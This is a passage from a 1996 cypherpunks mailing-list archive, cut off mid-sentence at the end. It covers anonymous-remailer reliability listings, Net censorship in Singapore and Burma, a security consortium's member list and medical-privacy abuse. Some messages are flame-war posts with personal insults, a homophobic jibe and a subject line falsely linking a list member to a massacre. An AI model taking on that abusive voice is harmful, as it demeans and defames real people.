>    We posted news* a few days ago of a white paper by the
>    OURS organization on network security. We have put it at:

Thanks, John. The members are interesting.

-Declan

***


MEMBER ORGANIZATIONS
   
   Bellcore
   
   Cedars-Sinai Health Systems
               
   Chase Manhattan Bank
                 
   Church of Jesus Christ of Latter-Day Saints
               
   Compaq Computer Corporation
                 
   CoreStates Financial Corporation
   
   Data Securities International, Inc.
   
   Digital Equipment Corporation
  
   EDS Corporation
                   
   Educational Testing Service
           
   EXXON Company USA
   
   IBM Corporation
   
   IDX Corporation
   
   Intel Corporation 
                  
   Learning Tree International
            
   Levi Strauss & Co.
   
   Massachusetts Institute of Technology
   
   Merrill Lynch, Inc.
   
   Microsoft Corporation
                 
   Motorola, Inc.
               
   New York Life Insurance Company
   
   Novell, Inc.
   
   Oracle Corporation
   
   Pacific Gas and Electric Company
   
   Phillips Petroleum
               
   Princeton University
   
   Security Dynamics, Inc.
     
   Societe Generale

   Software AG of N.A., Inc.
           
   SunTrust Service Corporation
   
   Sybase, Inc.
   
   Synopsys, Inc.
   
   Texaco, Inc.
   
   The Open Group
   
   Washington National Insurance Co.
   
   Ziff-Davis Publishing Company
   
  Information Protection Task Force Participants
                  
   American Express
   
   Bellcore
                    
   Chase Manhattan Bank
                  
   Data Securities International, Inc.
                  
   Digital Equipment Corporation
                     
   IBM Corporation
   
   ICL, Inc.
   
   Levi Strauss & Co.
   
   Mergent International, Inc.
   
   Merrill Lynch, Inc.
   
   Motorola, Inc.
                 
   Novell, Inc.
   
   Pacific Gas and Electric Company
               
   Phillips Petroleum
   
   Security Dynamics, Inc.
   
   SunTrust Service Corporation
   
   Trusted Info
   
   Union Camp Corporation





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 21 Oct 1996 06:52:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199610211350.GAA21258@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk mix pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@rigel.cyberpass.net> mix cpunk pgp hash latent";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = "<winsock@c2.org> cpunk pgp hash cut ksub reord";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"balls"} = "<remailer@huge.cajones.com> cpunk pgp hash latent cut ek";
$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp hash latent cut ek";
$remailer{"middle"} = "<middleman@jpunix.com> cpunk mix pgp hash middle latent cut ek reord";
$remailer{'cyber'} = '<alias@alias.cyberpass.net> alpha pgp';
$remailer{"dustbin"} = "<dustman@athensnet.com> cpunk pgp hash latent cut ek mix reord post";
$remailer{'weasel'} = '<config@weasel.owl.de> newnym pgp';
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(cyber mix)
(weasel squirrel)

The winsock remailer does not accept plaintext messages.

The alpha and nymrod nymservers are down due to abuse. However, you
can use the cyber nymserver. The nym.alias.net server will be listed
soon. See http://www.cs.berkeley.edu/~raph/n.a.n.html for details.

403 Permission denied errors have been caused by a flaky disk on the
Berkeley WWW server. Hopefully, this is fixed by now.

The penet remailer is closed.

Last update: Mon 21 Oct 96 6:48:54 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
jam      remailer@cypherpunks.ca          *-***-******    21:15 100.00%
cyber    alias@alias.cyberpass.net        +-*++-******    35:41  99.99%
dustbin  dustman@athensnet.com            --+++--+-+++  1:18:22  99.97%
exon     remailer@remailer.nl.com          -##+##**###     5:20  99.95%
winsock  winsock@c2.org                   ---__----.-- 11:50:31  99.90%
squirrel mix@squirrel.owl.de              --++--+++++   2:21:46  99.88%
lead     mix@zifi.genetics.utah.edu       +-+++-+++ ++    43:41  99.56%
balls    remailer@huge.cajones.com        * **********     8:52  99.21%
middle   middleman@jpunix.com              ._- --+--++  2:53:38  98.98%
replay   remailer@replay.com              +- * *+*****    10:30  98.49%
haystack haystack@holy.cow.net            +-*#+#  +*##     7:47  94.62%
mix      mixmaster@remail.obscura.com     --++++++      2:07:07  51.53%
extropia remail@miron.vip.best.com        -------      10:39:07  50.37%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Mon, 21 Oct 1996 07:36:33 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Washington Post editorial on global Net-censorship (10/21/96)
Message-ID: <Pine.GSO.3.95.961021073612.2936C-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Mon, 21 Oct 1996 07:35:27 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: fight-censorship@vorlon.mit.edu
Subject: Washington Post editorial on global Net-censorship (10/21/96)

While the Washington Post may be in thrall to the national security
establishment on encryption policy, it has done more to highlight the
dangers of Net-censorship than any other newspaper. Check out today's
editorial, attached below.

Also, the In the Loop column in today's Post reports that the poorly-named
"Nixon Center for Peace and Freedom" is hosting a $10,000-a-table banquet
called the "1996 Architect of the New Century Award Gala" on November 11.

This year's architect? "None other than that champion of democracy and
human rights the inimitable Lee Kuan Yew, former prime minister of
Singapore." The same fellow I wrote about in a HotWired column recently: 

   http://www.hotwired.com/netizen/96/36/index4a.html   
   The unknown user, who has the email address an511172@anon.penet.fi,
   posted hundreds of messages to the soc.culture.singapore newsgroup
   under the name of "Lee Kwan Yew," the retired prime minister of
   Singapore. The messages are short and unimaginative, yet apparently   
   are just enough to piss off the thin-skinned Singaporean officials. 
   One post reads: "We are small and vulnerable. Without regulations, we
   will be like Hong Kong, oops, fuck, bad example, they are actually
   doing quite all right. - SM Lee Kwan Yew, Republic of Singapore."  

I just called the Nixon Center and spoke to Tricia Williams, the assistant
to the president. She told me: "You would need to speak to Mr. Sines, the
president. I'm not involved in planning that." More later, if he returns
my phone call. 

-Declan

****************

                          CENSORSHIP IN CYBERSPACE
            
   Monday, October 21 1996; Page A18
   The Washington Post
   
   WHEN IT COMES to communication and censorship, the issues don't change
   much from one medium to the next. The latest reminder comes with a
   mini-gust of consternation that hit the World Wide Web a few days ago
   when, after prolonged outcry, the proprietor of a Sweden-based web
   site called the Gallery Grotesque closed it down. The site had been
   displaying gruesome images for two years and had attracted alarm most
   recently by posting several grisly photographs of a murder scene.

   Those who attempted to visit the web site after it was closed were 
   greeted with a message from the owner that included all the classic
   reasons for allowing speech even when it's violent or disturbing. The
   "gallery," the message explained, had been designed to display true
   images of "a debauched, self-indulgent society"; it had gotten several
   million "hits," or visitors, over its life; "myriad external
   pressures" had been brought to bear, and it was now closing "at a time
   of my own choosing" because "the concept has been fully explored."
   Finally, to those "repulsed or angered" by the images, it added,      
   "Consider this: The insanity still continues; only the messenger has 
   been quelled."

   Whatever you make of the issues of judgment or perhaps            
   self-dramatization involved here, the arguments closely resemble the
   familiar ones about information and its responsible use that have been
   going on for centuries. Meanwhile, the Internet experiences of such
   countries as China and Singapore offer a more sobering demonstration
   that the new technology may not change the landscape of freedom of  
   speech vs. censorship as much as many had hoped. When the Internet  
   with its global reach first became accessible in countries with       
   otherwise tight information control, human rights and pro-democracy 
   activists foresaw a virtual end to isolation for their colleagues in
   closed societies, just as fax machines had buoyed Chinese student
   protesters a decade ago. Some talked of a global "archive of banned
   books" that could be accessed from any point in the world, thus
   rendering book-banning by individual nations pointless.

   Unfortunately, governments interested in maintaining censorship       
   quickly have found ways to use the technology to their benefit. Though
   decentralized and ungovernable, the Internet is also highly
   transparent: No one can be sure who is watching, and most messages
   leave tracks. The governments of China, Burma and Singapore have been
   cited as making use of this characteristic of the medium, announcing
   heavy penalties on those who access unauthorized sites, and, in Iran
   particularly, constructing elaborate technological fire walls to allow
   their citizens to tap some but not all of the Web's information.

   The fire walls may prove rickety, and, even with the restrictions,
   activists may discover over time that access to e-mail and the Web
   brings more advantage than danger. Even so, the lesson remains:
   Technology may alter the dimensions of the problem of censorship, but
   it doesn't take the problems away.

###







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 21 Oct 1996 08:21:47 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Timmy May
In-Reply-To: <199610210453.AAA17082@nrk.com>
Message-ID: <D6c6VD26w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


David Lesher <wb8foz@nrk.com> writes:

> Dr.Dimitri Vulis KOTM sez:
> > Sounds like a crontab job, or Timmy May, or both.
>
> THIS sounds like our friend SternFUD.
> {Who, BTW, is back attacking folks in the pgp groups..}

Timmy May and SternFUB get along _fabulously.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Mon, 21 Oct 1996 06:03:08 -0700 (PDT)
To: Blanc Weber <blancw@microsoft.com>
Subject: RE: Goodbye
Message-ID: <9609218459.AA845913665@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


Blanc Weber <blancw@microsoft.com> wrote:
>It all depends, as usual, on the individuals involved -  on the quality
>they bring to the subject, to the list, to the enterprise.

>Interesting question:  what do elite sophisticates *do*, once they've
>reached their pinnacle?

Harlan Ellison suggests one possibility in his 1967 story titled:
The Prowler in the City at the Edge of the World.

James





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pyros Everflame <pyros@geocities.com>
Date: Mon, 21 Oct 1996 05:54:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Blue Box Plans & hacker bbs's
Message-ID: <326B826F.670F@geocities.com>
MIME-Version: 1.0
Content-Type: text/plain


Check out these sites:

L0pht heavy industries
<a href="http://www.softaid.net/nuke/marks.html">Mad Dingo's
Bookmarks</a>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Mon, 21 Oct 1996 06:17:10 -0700 (PDT)
To: IPG Sales <ipgsales@cyberstation.net>
Subject: RE: Q.E.D. reply to petty MESSger
Message-ID: <9609218459.AA845914524@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


Deadwood <ipgsales@cyberstation.net> wrote:
>To paraphrase John Dean, the truth will always come out and your
>ass braying will never stop that truth. 
 
>Don Wood

Be careful of what you wish for. You may just get it.

James
 


  









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 21 Oct 1996 06:38:37 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Crypto Raid
Message-ID: <1.5.4.32.19961021133801.00689b90@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   In a coincidence with the Biham/Shamir smart card attack,
   AP reports October 20 on an Israeli raid of News Datacom
   Research for $150 million tax fraud, allegedly because
   locally developed crypto products were smuggled out of
   the country. News Datacom develops and markets encryption
   systems for pay-TV based on Shamir's work, and he is a
   part-owner.

   Recall that Markoff's story on DFA cited Bahim's
   experience with pirate-TV and smart-card tampering.

   FiTi ran stories last May about the company's financial
   derring-do, which we've placed with the AP report at:

      http://jya.com/keylok.txt

   We've also put the Biham/Shamir DFA post and NYT article
   at:

      http://jya.com/dfa.htm








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Noorsham <noorsham@tm.net.my>
Date: Sun, 20 Oct 1996 19:21:01 -0700 (PDT)
To: red <rednax@tm.net.my>
Subject: Re: Don't ask why, thank you.
In-Reply-To: <199610200616.OAA02136@gandalf.asiapac.net>
Message-ID: <326AD524.7F41@tm.net.my>
MIME-Version: 1.0
Content-Type: text/plain


red wrote:
> 
> Why?
> 
> Date: 20th October 1996.
>         The purpose of life,... is not to be found. I have been pursuing
> this
> thought and question to many of the people I have met in the past few
> weeks.
> Sad enough to report that I have found no answers or clues that if anyone
> ever
> know what it is or could be. One thing for sure is material and physical
> objects are close to replacing the purpose, the real purpose if there is
> one.
> I am still quizzed on how there is a purpose in which we all strive to
> attain.
> There must an objective somewhere which clearly states,"You, whatname
> whatage,
> will have to do this, do that."
>         Somehow, in the pursuit for the answer I have strained my physical
> and emotional self. I have realised what I am doing and that I am actually
> directionless, like all the people I know. Doing things for the sake of
> doing.
> Clearly, I think television or rather, the mass media in general has caused
> the gradual eradication of purpose in life for many people. What do you
> want?
> What do I want? Sure enough, we do not ask ourselves that question once too
> often, but spending more time pondering about it, it really makes no sense
> in what we do having corellation to what we want. What is it actually that
> we
> seek in life?
>         Which brings us back to the time when we thought we had a purpose.
> Could you recall the times when you really wanted something? Or someone?
> Why?
> Simply because we didn't have it. It's a mass media driven, pointless race
> to
> own something, which actually doesn't make much sense. I am not sure why
> all
> of us are acting the way we are. In trying to understand it, I began to
> question why I would want to know. Why do I want to know? So that I could
> talk
> about it? Write a book? Be famous and rich? Be respected? Now, take a
> minute
> off and think of what you just read. It's from the media to the people. The
> people made the media. People are driving people nuts. Is this what we
> want?
> Once you shrink the big picture, you realise that nothing makes any sense
> anyway. And what is "making sense"?
>         What do we gain from realising all this which makes us act and live
> the way we are? We get to past our time. Since we were born, we had nothing
> except time. Shitloads of it, excuse me. So we start doing things. Things
> that
> actually do not mean much to us but, "heck, I've got all the time in my
> life"
> So, it starts to generate a sort of hype, "hey, he's doing something, maybe
> I
> should too." Then another fella comes in, "Well I've got nothing to do,
> maybe
> I should tell others what these two guys are doing" So the snowball gets
> rolling. The moment it stops, if it ever stops, I guess we go crazy. Now
> what
> is crazy? Understanding why we actually have no reason of being here? I'm
> not
> going to start on religion, if you're getting my rift here.
>         So here we are, pretending that we love this and like doing that.
> Okay, I admit somethings are fun but 90% of the time you realise, "gee,
> what
> is it that I want?" If everyone were to ask the same question at the same
> time,
> then we'd all be crazy or something, whatever. The problem is, there's five
> billion people and each one not voicing what they think would hold
> themselves
> back by saying "Now, if I say that, these guys would think I'm nuts, and
> my..."
> Some do get to express, and once they express it, they are lost in the
> world
> of understanding, they realise that we all have no reasons, logical or
> whatsoever, to be where we are doing what we think we need to do. Now these
> guys are labeled "nuts" and grouped together. See how happy they are in
> "Cuckoo's Nest". Okay, so the interns are a little pain in the ass. But
> look
> at yourself! We are basically doing things of no relevance. Question what
> you
> do with "So?" You are bound to realise what you have probably tried to hide
> all your life. That we are all alone. That we are all meaningless. That we
> are
> all trying to hide from each other what we fear.
>         No, this is not a scam. And sorry, I don't have the solution.
> 
>         I guess we are the same.
>         In the dark we are alone, in the bright we skin and hide.
> 
> rednax@tm.net.my
> http://www.asiapac.net/~rednax
> 
> "I have seen little angels turn bad
> But that's just because they have grown
> Likewise the problems I currently access
> They are small matters full blown"



Dear internet users

It seem like we have find an easy way to disseminate our point and thought. Through internet with 
address "beta@...". But some people have abused this privilage by disseminating some rubbish which 
came from their indiscipline brain. I highly appreciate if all internet users do not write any rubbish 
like this and addressed it to "everybody". From my calculation, this rubbish contain 3408 characters, 
(not inclusive blank and control characters). If this type of rubbish is being desseminate to 
everybody, it will occupy more than 13,632 bytes on each machine. Multiply that with number of users. 
It took me several minutes trying to understand what s/he want to deliver, multiple that with number 
of readers. What a waste. 

So to all internet users, I request your kind cooperation:
1	to restrain yourselve from writing rubbish and ask others to read it.
2	if you have to write something to clear your brain, you can either put it on the bulletin 
board or direct it to specific person, such as psychologist, physiotherapist or a doctor. Your mother 
in law is another person you should think of.
3	if you have problem, which you think our fellow users may help, please state your problem 
clearly, and short.
4	please understand that internet users come from variety backgrounds. What is right for you, 
may be just a rubbish for others and it can cause unnecessary wastage of resources.


"If you don't have any valuable to say, keep quiet".


Noorsham




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Mon, 21 Oct 1996 08:35:49 -0700 (PDT)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: [SERDAR ARGIC]Vulis role in the spamming of 2,500,000 Cypherpunks
In-Reply-To: <ask5VD23w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961021113124.7879B-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 20 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> > The friend and colleague of your whom you know says much about you. Yet
> > another Net Loon. You action of posting a 48K spam to this list in attempt
> > to get me upset has resulted in a single, half-felt yawn.  Others may be
> > pissed at your attempt at spamming me.  I give not a shit.
> 
> Dr. Serdar Argic is a world-famous historian and Ray makes 
> mistakes in English.

And both your points are totally irrelevant, if not outright wrong.

> > My original message to you stands: Vulis, grow up.

<51Kb spam message deleted.>

Vulis, this is your 2nd spam to this list which is totally unrelated to 
any cypherpunk issues.  As this is totally off topic, flame mail, and 
spam, I suggest you grow up.  Again my original message to you stand: 
grow up.

2nd, since you are bent on sending your flames to this list, I move to 
vote you off the list.

Have a nice day.

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |God of screwdrivers"|AK|        do you not understand?       |=======
===================http://www.brainlink.COM/~sunder/=========================
      If the Macintosh is a woman...  Then Windows is a Transvestite!
           ActiveX! ActiveX! Format Hard drive? Just say yes!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 21 Oct 1996 11:36:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [SERDAR ARGIC] Ray Arachelian's role in massacare of 2,500,000 Moslems
In-Reply-To: <326b8b04.262143111@205.164.13.10>
Message-ID: <cuo6VD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


mianigand@outlook.net (Michael Peponis) writes:
> Sandy made you a fair offer, if you are out to prove that Tim May is
> an <insert insult here> and you are the divine being of cryptology,

Correction: I don't claim to be the divine being of cryptology.

> then show up to one of the meetings and prove yourself in person,
> or atleast insult Tim to his face.

I think to talk about cryptography to the San Francisco Gay and Lesbian
Cypherpunks is to throw beads before the swine.

Timmy May is an ignorant liar.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Mon, 21 Oct 1996 12:11:20 -0700 (PDT)
To: Declan McCullagh <declan@eff.org>
Subject: Re: Paper on Network Security
Message-ID: <9610211910.AA29346@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


See!  And you all said us Mormons had no crypto 
relevence :)

I missed the pointer to the article/paper...I wanna
see what my church's involvement is..

Anyone got it handy?

   Ryan

---------- Previous Message ----------
To: jya
cc: cypherpunks
From: declan @ eff.org (Declan McCullagh) @ smtp
Date: 10/21/96 06:44:56 AM
Subject: Re: Paper on Network Security

On Sun, 20 Oct 1996, John Young wrote:

>    We posted news* a few days ago of a white paper by the
>    OURS organization on network security. We have put it at:

Thanks, John. The members are interesting.

-Declan

***


MEMBER ORGANIZATIONS
   
   Bellcore
   
   Cedars-Sinai Health Systems
               
   Chase Manhattan Bank
                 
   Church of Jesus Christ of Latter-Day Saints
               
   Compaq Computer Corporation
                 
   CoreStates Financial Corporation
   
   Data Securities International, Inc.
   
   Digital Equipment Corporation
  
   EDS Corporation
                   
   Educational Testing Service
           
   EXXON Company USA
   
   IBM Corporation
   
   IDX Corporation
   
   Intel Corporation 
                  
   Learning Tree International
            
   Levi Strauss & Co.
   
   Massachusetts Institute of Technology
   
   Merrill Lynch, Inc.
   
   Microsoft Corporation
                 
   Motorola, Inc.
               
   New York Life Insurance Company
   
   Novell, Inc.
   
   Oracle Corporation
   
   Pacific Gas and Electric Company
   
   Phillips Petroleum
               
   Princeton University
   
   Security Dynamics, Inc.
     
   Societe Generale

   Software AG of N.A., Inc.
           
   SunTrust Service Corporation
   
   Sybase, Inc.
   
   Synopsys, Inc.
   
   Texaco, Inc.
   
   The Open Group
   
   Washington National Insurance Co.
   
   Ziff-Davis Publishing Company
   
  Information Protection Task Force Participants
                  
   American Express
   
   Bellcore
                    
   Chase Manhattan Bank
                  
   Data Securities International, Inc.
                  
   Digital Equipment Corporation
                     
   IBM Corporation
   
   ICL, Inc.
   
   Levi Strauss & Co.
   
   Mergent International, Inc.
   
   Merrill Lynch, Inc.
   
   Motorola, Inc.
                 
   Novell, Inc.
   
   Pacific Gas and Electric Company
               
   Phillips Petroleum
   
   Security Dynamics, Inc.
   
   SunTrust Service Corporation
   
   Trusted Info
   
   Union Camp Corporation








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 21 Oct 1996 13:00:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: improving cpunk S/N via grouplens/filtering
Message-ID: <199610212000.NAA29809@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



an interesting new field called "collaborative filtering" seems
to have strong potential in helping separate signal-to-noise,
and might be of interest to some cpunks here as a pet project.

Brad Miller is working on his PhD. in this area and put together
a nice system inside many news readers that allows people to
read/ratings articles and track their ratings. the system uses
the heuristic that people who agree or disagree consistently
on ratings on particular messages in the past will tend to
do so in the future, and it uses this to extrapolate ratings
on messages a person has not yet rated.

essentially he has all the technical stuff down and mostly
just needs trial users. it wouldn't
be hard to plug it all into the cpunk list to see how well it
works. its the most promising route I know of at the moment,
for solving an extremely difficult problem that pervades cyberspace.

however, B.M. has been working on the project for a long time
and at least from my perspective it doesn't seem to have
reached "critical mass" yet, which surprises me. anyway, the
URL

http://www.cs.umn.edu/Research/GroupLens/grouplens.html

is anyone here familiar with this project? what do you think
about how effective it is?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: -Jerome Thorel- <thorel@netpress.fr>
Date: Mon, 21 Oct 1996 04:17:28 -0700 (PDT)
To: thorel@netpress.fr
Subject: lambda 2.11 - Short-circuits in Burma
Message-ID: <v03007803ae91139b9d3e@[194.51.213.140]>
MIME-Version: 1.0
Content-Type: text/plain


netizen's --> Lambda Bulletin 2.11 <-- contents

+ Short-circuits in Burma
+ Medical privacy and PGP
+ New York's CDA on tracks


		*	*	*	*	*
		SHORT-CIRCUITS IN BURMA

The military regime in Burma decided last month to ban information
technology use and possession, in order to sustain its new iron fist on
dissidents and members of the National League for Democracy.

Among other news here's a message sent through the mailing list of the US
organisation CyberPOLIS.

---fwd message---

>>From: George Sadowsky <George.Sadowsky@nyu.edu>
>>Subject: Re: Burma Bans modems

>>RANGOON, BURMA, 1996 SEP 27 (NB) -- Burma has made owning, using,
>>importing or borrowing a modem or fax machine without government
>>permission a crime, punishable by up to 15 years in jail, according to a
>>report by United Press International.

>>Burma's military government has imposed what's called "The Computer
>>Science Development Law" which empowers the Ministry of Communications,
>>Posts and Telegraphs to specify what exactly can be restricted, UPI
>>reports.

>>UPI quotes the government-run newspaper New Light of Myanmar as saying
>>the same punishment is prescribed for anyone who sets up a link with a
>>computer network without the prior permission of the ministry, or who
>>uses computer network and information technology "for undermining state
>>security, law and order, national unity, national economy and national
>>culture, or who obtains or transmits state secrets."

>>UPI reports that in July a diplomat, Leo Nichols, died in prison after he
>>was sentenced to a lengthy term for illegal possession of fax machines.

>>It's clear from this action that the SLORC, i.e. the "State Law and Order
>>Restoration Committee" (sic!) understands full well the benefits and
>>importance of the Internet and other forms of electronic communication to
>>open societies, and is determined to deny these benefits to its citizens.
>>Given its recent history and the quasi-imprisonment of Daw Aung San Suu
>>Kyi, this new action is perfectly consistent with the government's
>>previous abysmal record.

>>Countries who would deny open Internet access to its citizens might well
>>pause to consider if they wish to be associated with the current
>>government of Myanmar in doing so.
...
c y b e r P O L I S
-----------------------------------------------
C o m m u n i c a t e T h i s C u l t u r e
( Christopher D. Frankonis -- baby-x@cyberpolis.org )

---end of fwd message---

-------------------
FURTHER INFOS
According to other sources--international press reports and electronic
forums like Usenet's *soc.culture.burma*--it turns out that Ms Aung San Suu
Kyi, 1991 Nobel Peace Prize and NLD leader, saw her telephone line cut on
Friday, Sept. 28 on the evening. That was the beginning on a widespread
crackdown on dissidents and a ban of NLD meetings. University Street, where
Ms Suu Kyi lives, was blocked to avoid demonstrations. Hundred of citizens
and NLD supporters were detained, some were released by mid-October.

The Web site http://freeburma.org is a well known relay for the Burmese
diaspora, especially the daily newsletter BurmaNet, which offers a rich
compilation of dissidents' communiqués and Western newspapers articles and
editorials.

Ms Suu Kyi writes a daily letter from her home in Rangoon which is
published in the Japanese newspaper Mainichi Shimbun (in japanese,
http://www.mainichi.co.jp) - a translation appears daily in
soc.culture.burma. It seems that the letter (surely copied on an audio
tape) continues to be shipped ouside the country to be published in the
Tokyo-based newspaper.

Furthermore, other reports claimed that Burma doesn't have any official
connection to the Internet. It seems to be true, but a Burmese and US
resident found that the domain name "mmnic.net" (mm for Myanmar) was
reserved by the Burmese governement in February, 1994. The operation was
made possible with the help of the Internet provider Asia Pacific NIC based
in Tokyo, Japan. A spokesman confirmed he reserved the domain on the behalf
of Burma's State, and that it was dedicated to a future Internet
connection.

		*	*	*	*	*
		MEDICAL PRIVACY AND PGP

---fwd message---

>Sender: dfickeisen@cpsr.org (Duane Fickeisen)
> Subject: cr> Health Info Database Misused
>
>An AP story from Tampa Bay appearing in the Palo Alto Daily News asserts
>that a public health worker took a laptop and disks with confidential
>lists of people with AIDS and HIV home and to a gay bar to check out the
>HIV status of potential dates and offered to look up names of people his
>friends were interested in dating. One person asserted that he had warned
>friends away from potential dates, telling them that their names were "on
>the list." Another claimed that people interested in dating him backed
>away after the health worker talked to them. The County Health Department
>has fired him, although he claims he did nothing wrong. The former health
>worker also owns and lives in a funeral home. The state had permitted such
>databases to be removed from offices and taken home until they changed
>their internal rules two weeks ago.
>
>Raises anew questions about privacy and confidentiality of records,
>security, and misuse/abuse of information for personal and private gain.
>This ought to be raised up as an example of abuse in response to the
>announced plans for a national health information database.
>
>Duane H. Fickeisen, Interim Director
>Computer Professionals for Social Responsibility

---end of fwd message---

As far as I can remember, Phil Zimmermann, speaking during the
